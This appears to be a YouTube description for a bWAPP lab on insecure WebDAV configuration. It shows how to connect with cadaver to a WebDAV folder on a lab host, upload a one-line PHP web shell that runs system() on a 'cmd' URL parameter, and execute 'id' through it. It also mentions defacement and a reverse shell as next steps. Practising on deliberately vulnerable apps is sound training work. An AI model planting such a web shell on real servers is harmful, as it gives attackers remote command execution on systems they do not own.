bWAPP Insecure WebDAV Configuration
Insecure WebDAV Configuration - Low Security Level
Solution:
Step 1. On the lesson page click on WebDEV, a new window will pop up.
http://10.0.2.4/webdav/ is the address to the webdav folder. We are going to use a tool called 'cadaver' to query webdav and upload a file to the remote server.
Step 2. Open command prompt and type cadaver
Type help it will display all the commands
Give below commands
open http://10.0.2.4/webdav/
ls
put
Step 3. Open new command prompt and create a simple php shell.
Command - nano pseudotime.php
Note: As angled brackets aren't allowed in YouTube Description, replacing them with ( ), kindly make necessary change.
(?php
echo system($_GET['cmd']);
?)
Save the file
put pseudotime.php pseudotime.php // Follow steps as shown in the video
Step 4. Go to the url and give url as
http://10.0.2.4/webdav/pseudotime.php?cmd=id.
Note: Not covered in this video but you can explore this lesson further with -
i. Upload an image to deface the website
ii. Get a reverse shell generated.
PseudoTime
